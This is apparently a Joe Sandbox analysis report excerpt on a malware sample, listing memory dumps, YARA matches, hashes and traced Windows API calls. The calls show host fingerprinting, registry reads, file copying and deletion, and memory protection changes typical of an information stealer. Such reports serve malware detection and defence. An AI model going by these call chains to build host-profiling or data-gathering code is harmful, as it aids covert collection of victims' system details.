                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 3404098578-2766056989
                                                                                                                                                        • Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                        • Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
                                                                                                                                                        • Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                        • Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6B08C947
                                                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6B08C969
                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6B08C9A9
                                                                                                                                                        • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6B08C9C8
                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6B08C9E2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4191843772-0
                                                                                                                                                        • Opcode ID: f88ebaa9eac15cae56a336c73c0af45f62c4c64df784737af65840cd311f42c6
                                                                                                                                                        • Instruction ID: 7010d7398c0ed0670f0fff0eb0ba60d4f784ef5b198d08aae1c228c2971f7ae3
                                                                                                                                                        • Opcode Fuzzy Hash: f88ebaa9eac15cae56a336c73c0af45f62c4c64df784737af65840cd311f42c6
                                                                                                                                                        • Instruction Fuzzy Hash: 6B210A327512146BDF288E64EC88BAE7FBEAB46700F500159FD46A7680DF3499008BD0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 004129BA
                                                                                                                                                        • lstrcat.KERNEL32(?,0041D888), ref: 004129D7
                                                                                                                                                        • lstrcat.KERNEL32(?,04330800), ref: 004129EB
                                                                                                                                                        • lstrcat.KERNEL32(?,0041D88C), ref: 004129FD
                                                                                                                                                          • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                          • Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                          • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                          • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                          • Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                          • Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                                                                                        • String ID: L0A
                                                                                                                                                        • API String ID: 2667927680-1482484291
                                                                                                                                                        • Opcode ID: a9c67daaacc7e92ff4ee03e3180183e77f5cf7bec37821e85d74a49978411dd6
                                                                                                                                                        • Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
                                                                                                                                                        • Opcode Fuzzy Hash: a9c67daaacc7e92ff4ee03e3180183e77f5cf7bec37821e85d74a49978411dd6
                                                                                                                                                        • Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3466090806-0
                                                                                                                                                        • Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                        • Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
                                                                                                                                                        • Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                        • Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,04332990,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,04337410,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3466090806-0
                                                                                                                                                        • Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                                                                        • Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
                                                                                                                                                        • Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                                                                        • Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,04332418,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,04336798,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3466090806-0
                                                                                                                                                        • Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                                                                        • Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
                                                                                                                                                        • Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                                                                        • Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(04330570,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
                                                                                                                                                        • LoadLibraryA.KERNEL32(043373D0,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0432E458,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                          • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                        • SetEnvironmentVariableA.KERNEL32(04330570,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02
                                                                                                                                                        Strings
                                                                                                                                                        • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                        • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                        • API String ID: 2929475105-3463377506
                                                                                                                                                        • Opcode ID: 5e87bb327afe644bc77b25f1e22387be2ab2af628167e3175e717012408de276
                                                                                                                                                        • Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
                                                                                                                                                        • Opcode Fuzzy Hash: 5e87bb327afe644bc77b25f1e22387be2ab2af628167e3175e717012408de276
                                                                                                                                                        • Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                        • String ID: :h@$:h@$@:h@
                                                                                                                                                        • API String ID: 544645111-3492212131
                                                                                                                                                        • Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                        • Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
                                                                                                                                                        • Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                        • Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                          • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,043378D8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040D0DF
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040D0F3
                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040D16C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 211194620-0
                                                                                                                                                        • Opcode ID: c173c51fbfe223dc8c5039b41b5fbfd2ab8ba70fab74c7fee496f720ccfcfbc1
                                                                                                                                                        • Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
                                                                                                                                                        • Opcode Fuzzy Hash: c173c51fbfe223dc8c5039b41b5fbfd2ab8ba70fab74c7fee496f720ccfcfbc1
                                                                                                                                                        • Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                          • Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                          • Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                          • Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                          • Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                          • Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                          • Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                          • Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,04332418,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                          • Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,04336798,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                          • Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                          • Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,04337590,00000000,?,0041D74C,00000000,?,00000000,00000000,?,04330810), ref: 0041438F
                                                                                                                                                          • Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,04337590,00000000,?,0041D74C,00000000,?,00000000,00000000,?,04330810), ref: 00414396
                                                                                                                                                          • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,043306D0,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                          • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                          • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                          • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                          • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                          • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                          • Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
                                                                                                                                                          • Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
                                                                                                                                                          • Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
                                                                                                                                                          • Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0
                                                                                                                                                          • Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,043365E8,00000000,?,0041D758,00000000,?,00000000,00000000,?,043375F0,00000000), ref: 004144C0
                                                                                                                                                          • Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                          • Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                          • Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,043365E8,00000000,?,0041D758,00000000,?,00000000,00000000,?,043375F0,00000000), ref: 00414542
                                                                                                                                                          • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                          • Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                          • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                          • Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                          • Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                          • Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A
                                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000,?,04337350,00000000,?,0041D76C,00000000,?,00000000,00000000,?,043367F8,00000000,?,0041D768,00000000), ref: 0041037E
                                                                                                                                                          • Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                          • Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                          • Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                          • Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                          • Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                          • Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,04332990,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                          • Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,04337410,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                          • Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                                                                          • Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
                                                                                                                                                          • Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855
                                                                                                                                                          • Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
                                                                                                                                                          • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3
                                                                                                                                                          • Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,04336810,00000000,?,0041D774,00000000,?,00000000,00000000,?,043368D0), ref: 0041496D
                                                                                                                                                          • Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                          • Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                          • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                          • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                          • Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9
                                                                                                                                                          • Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
                                                                                                                                                          • Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
                                                                                                                                                          • Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D
                                                                                                                                                          • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,04332E78,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                                                                          • Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
